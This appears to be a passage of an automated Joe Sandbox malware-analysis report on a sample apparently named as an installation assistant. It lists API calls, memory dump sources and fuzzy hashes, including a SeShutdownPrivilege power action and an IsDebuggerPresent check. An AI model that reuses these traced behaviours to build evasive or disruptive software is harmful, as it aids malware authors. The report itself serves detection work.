                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0B62E6
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0B62F4
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0B631B
                            • NtInitiatePowerAction.NTDLL ref: 6C0B632F
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3256374457-3733053543
                            • Opcode ID: 14f78f7a2d27e1f6f305f6bb0e4c284f41015081fd4e7ada05f48124d5fcd46a
                            • Instruction ID: ab7c4f771b133eb0192f17f72467a7c513df25ed5468bc7b7af7d094a35b918a
                            • Opcode Fuzzy Hash: 14f78f7a2d27e1f6f305f6bb0e4c284f41015081fd4e7ada05f48124d5fcd46a
                            • Instruction Fuzzy Hash: 9FF0B470644300BFEA006B24CD0EB5A7BF4EF45701F018608F985A60C1DB706894DF96
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: \j`7$\j`7$j
                            • API String ID: 0-3644614255
                            • Opcode ID: 585557aeab70aacfc5f2ba7b9dfbd61afc335d62f4debd3b680460f93aa197cb
                            • Instruction ID: eea4123f5518ad940109ef53c5cce7a019a2473dcd2c710a312833e5bca54af6
                            • Opcode Fuzzy Hash: 585557aeab70aacfc5f2ba7b9dfbd61afc335d62f4debd3b680460f93aa197cb
                            • Instruction Fuzzy Hash: 4A424476A093A2CFCB14CF28C49065ABBE1ABC9354F14495EE4D5CB360D339D945CBA3
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C1484B1
                              • Part of subcall function 6C14993B: __EH_prolog.LIBCMT ref: 6C149940
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: 1$`)K$h)K
                            • API String ID: 3519838083-3935664338
                            • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                            • Instruction ID: 6e76c75886d43baae6fdd511ebbda00df42d07ed4a2e25326e5b44a7b7dc3350
                            • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                            • Instruction Fuzzy Hash: 53F28C70901248DFDB11CFA8C994BDDBBB5AF99308F28809AE449EB781D7749E85CF50
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C13AEF4
                              • Part of subcall function 6C13E622: __EH_prolog.LIBCMT ref: 6C13E627
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: $h%K
                            • API String ID: 3519838083-1737110039
                            • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                            • Instruction ID: 51d3e8632b342ba401a0b07c1bd909e77f12615f2a4f3659599f78f9100e0b43
                            • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                            • Instruction Fuzzy Hash: B2539830901268DFDF15DBA4C894BDDBBB4AF1930CF2440D8D459AB691DB34AE89CF61
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C116CE5
                              • Part of subcall function 6C0ECC2A: __EH_prolog.LIBCMT ref: 6C0ECC2F
                              • Part of subcall function 6C0EE6A6: __EH_prolog.LIBCMT ref: 6C0EE6AB
                              • Part of subcall function 6C116A0E: __EH_prolog.LIBCMT ref: 6C116A13
                              • Part of subcall function 6C116837: __EH_prolog.LIBCMT ref: 6C11683C
                              • Part of subcall function 6C11A143: __EH_prolog.LIBCMT ref: 6C11A148
                              • Part of subcall function 6C11A143: ctype.LIBCPMT ref: 6C11A16C
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            Similarity
                            • API ID: H_prolog$ctype
                            • String ID:
                            • API String ID: 1039218491-3916222277
                            • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                            • Instruction ID: d1d15ad61cea302b56be09ef2690b6553dbf3e0cc13fabbae8a7daee5a11edfd
                            • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                            • Instruction Fuzzy Hash: 87039D30809298DFDF15CFA4C950BDCBBB1AF19318F2480AAD44567B91DB786B8DCB61
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: 3J$`/J$`1J$p0J
                            • API String ID: 0-2826663437
                            • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                            • Instruction ID: c245b2524776a1bc5f7fc3670c5758cbee2645ca7ba1f00f127c2cd777d104fe
                            • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                            • Instruction Fuzzy Hash: 42410A71F109600AF3488E7A8C855667FC3C7C9346B4AC23DD575C76D9DA7DC40786A4
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: W
                            • API String ID: 3519838083-655174618
                            • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                            • Instruction ID: f4a166ec71df3ed5c4374f28202db7fc7ce80edc0199df113f708a299bf8ffdb
                            • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                            • Instruction Fuzzy Hash: 67B27974A01259DFDB00CFA8C888B9EBBB5BF59318F248099E849EB741C775ED51CB60
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C0C07E9
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C0C07F3
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C0C0800
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 8a54689cf65ba9e7c8f7f561f4f452b0a3a9a6f0feccd6234e2786cebf517e4c
                            • Instruction ID: 7d0fd3e4caf31eae95820d8e932577a8f103e305ba6f2c4405efc4052926b677
                            • Opcode Fuzzy Hash: 8a54689cf65ba9e7c8f7f561f4f452b0a3a9a6f0feccd6234e2786cebf517e4c
                            • Instruction Fuzzy Hash: B931907590121CABCF61DF64D888B8DBBF8AF08714F5042EAE41CA7250EB709B858F45
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,6C0BF7A5,?,?,?,?), ref: 6C0BF70F
                            • TerminateProcess.KERNEL32(00000000,?,6C0BF7A5,?,?,?,?), ref: 6C0BF716
                            • ExitProcess.KERNEL32 ref: 6C0BF728
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                             • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 1ff351e8aab5f7eed733b5618cca7bc10cd70edfcfa748821bac1c98fa3eaff5
                            • Instruction ID: 8de57c76b195938a70b92fcc167f1c451dd625317d99b3532d5317470a39e918
                            • Opcode Fuzzy Hash: 1ff351e8aab5f7eed733b5618cca7bc10cd70edfcfa748821bac1c98fa3eaff5
                            • Instruction Fuzzy Hash: 56E0123A184108EBCF41ABD5C848B893BB8EB49A45B114454F804A7621CF36EA81CA81
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C13489B
                              • Part of subcall function 6C135FC9: __EH_prolog.LIBCMT ref: 6C135FCE
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @ K
                            • API String ID: 3519838083-4216449128
                            • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                            • Instruction ID: f3c84ce53e0656e4cf6ec8b686a0a2900f8835d7be8a7aa2c966be0f78d75dfe
                            • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                            • Instruction Fuzzy Hash: 9AD1CD31E042248FDB14CFA4C49079EBFB6BF9431CF14916AE419ABB88CB769885CB55
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: x=J
                            • API String ID: 3519838083-1497497802
                            • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction ID: 2b40f079ce18dd4439a958fd79d6dc4fd55820f4318ae9f8dcf89a530b5c68a0
                            • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                            • Instruction Fuzzy Hash: 6791F231D812199ECF04DFA8C890BEDB7F1BF4D348F64816ED46167A90DB326989CB50
                            APIs
                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C0B7E20
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C0B8643
                              • Part of subcall function 6C0B98E9: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C0B862C,00000000,?,?,?,6C0B862C,?,6C0E555C), ref: 6C0B9949
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                             • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                            • String ID:
                            • API String ID: 915016180-0
                            • Opcode ID: 74ddff040bbdc4ab5f7aa48118472a4e15bc5031bc666592604684813f40eaac
                            • Instruction ID: 33e2c49c53da8fa321587719f5d429f80c116d5b739f2fd11b154c8a1ddd70bc
                            • Opcode Fuzzy Hash: 74ddff040bbdc4ab5f7aa48118472a4e15bc5031bc666592604684813f40eaac
                            • Instruction Fuzzy Hash: F9B1BC71A002069BCF09CF65C88179EBBF4FB09318F64822AD416F7790E735A959DF94
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                            • Instruction ID: 6a0ef9c83beed65d14636e73f220fc9426f1954604509977aef8987aa83aa2b5
                            • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                            • Instruction Fuzzy Hash: 2BB2CFB1A04758CFCB21CFA8C494BDEBBF1BF15308F908199D4AAA7A41D770A995CF50
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: @4J$DsL
                            • API String ID: 0-2004129199
                            • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction ID: 31e19cdc31ef9f8150c9cbce63e8348f22afb6955dbd8e3cc03fca2c0614f809
                            • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                            • Instruction Fuzzy Hash: 6B217137AA49564BE74CCA68DC33EB926C1E744305B89527EE94BCB7D1DF5D8800CA48
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                            • Instruction ID: 3be8faaaf8e1cbe6db1bb02476648a9803f8ae5d6036f7bc2a917419fce21e93
                            • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                            • Instruction Fuzzy Hash: 3C1207B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EE898A7311D770E9568BC6
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: __aullrem
                            • String ID:
                            • API String ID: 3758378126-0
                            • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction ID: c7ba4d9da658f59a9202860462f2f3e0abaf438eeff636cf5fd6c07d27d78321
                            • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                            • Instruction Fuzzy Hash: DF51C871B092859BD710CF5AC4C06EEFBE6AF79214F18C05AE8C897242D27A599BC760
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                            • Instruction ID: 4c33445abe11c437492ef8be4bec18a5968981867bbd862113831d320078cce6
                            • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                            • Instruction Fuzzy Hash: 37D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: (SL
                            • API String ID: 0-669240678
                            • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction ID: 472a051db6b0b2b342244b1e3efa9f5fe28c7488ab6b9b259ebd6dd09c82e404
                            • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                            • Instruction Fuzzy Hash: 12519473E208214AE78CCE24DC2177572D2E784310F8BC1B99D8BAB6E6CD78989087C4
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                            • Instruction ID: 522c7aa4d5e628aa0643221512a7926dc578f72d934983212720e088a2642022
                            • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                            • Instruction Fuzzy Hash: AB728DB16042168FD748CF18C490268FBE1FF89314B9A46ADD96ADB742DB70E8D5CBD0
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction ID: 3c9c267460d450b3085d4f5f77eff2514ae5b65f049c4aad2c8ecce376e19717
                            • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                            • Instruction Fuzzy Hash: 6A6204B1A093448FC724CF19C58061AFBF6BFD8744F248A6EE89987714D770E845CBA2
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                            • Instruction ID: 675c888a716b02b9b39728709fb7c3107314dfb19dc6354dc1bfcaf4c7a4669e
                            • Opcode Fuzzy Hash: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                            • Instruction Fuzzy Hash: A9429F71604B058FD368CF69C8907AAB3E2FF84314F044A2EE996C7B94E774E549CB61
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                            • Instruction ID: c537653b47071ce538754dda9f3c03fb378e809dc2f6b0ed9aa5149c8ad74e34
                            • Opcode Fuzzy Hash: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                            • Instruction Fuzzy Hash: C602D773A0835147D729CE1DC890219B7E3FBC0390F6B4A2EF89647794DAB49946CFA1
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                            • Instruction ID: 4f230387cb529fcc6b5f2fc62c83fc59ebd610df8378c0cb0d64bf7015ee5bfd
                            • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                            • Instruction Fuzzy Hash: 20020A32A083118BD329CE2CC490359BBF2FBC4355F194B2EE59697A94D774D984CFA2
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                            • Instruction ID: f0ce588f03cd8d23c08e41aa96d4a857f562c8ef7bfb0a1b71b78c65aad5d9a9
                            • Opcode Fuzzy Hash: 04f499f9e3d4c93c3ee3b28235ad2abed55ba3d5e2a4d0777d40b1e79efdc42e
                            • Instruction Fuzzy Hash: 9912B170608B518FC324CF2EC494666FBF2AF85305F188A6ED1D687B91D735E548CBA1
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                            • Instruction ID: cca508f2802b3343050aff1854aee145d97af0377e419f7003d0596301a8fc21
                            • Opcode Fuzzy Hash: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                            • Instruction Fuzzy Hash: 47E1FF71604B048BD724CF2AD4603AAB7E2EBC5314F544A2EC5D6C7F81DB35E52ACB91
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                            • Instruction ID: 83209b3df236dfff7d93ca1aa519ce800aeeca84a4c8ccc4be9dd29b50c87cd4
                            • Opcode Fuzzy Hash: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                            • Instruction Fuzzy Hash: 79F1B1706087518FC328CF2DD4A4266FBE2AF89304F184A6ED1D6CBB91D739E554CBA1
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                            • Instruction ID: 78f2e38be3b746299bc7337d793869b4d32f1fc696add2b87b9dd2983639abe8
                            • Opcode Fuzzy Hash: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                            • Instruction Fuzzy Hash: 65F1B170508B618FC339DF29C4A026AFBF2BF85304F188A2ED5D687A91D339E555CB61
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
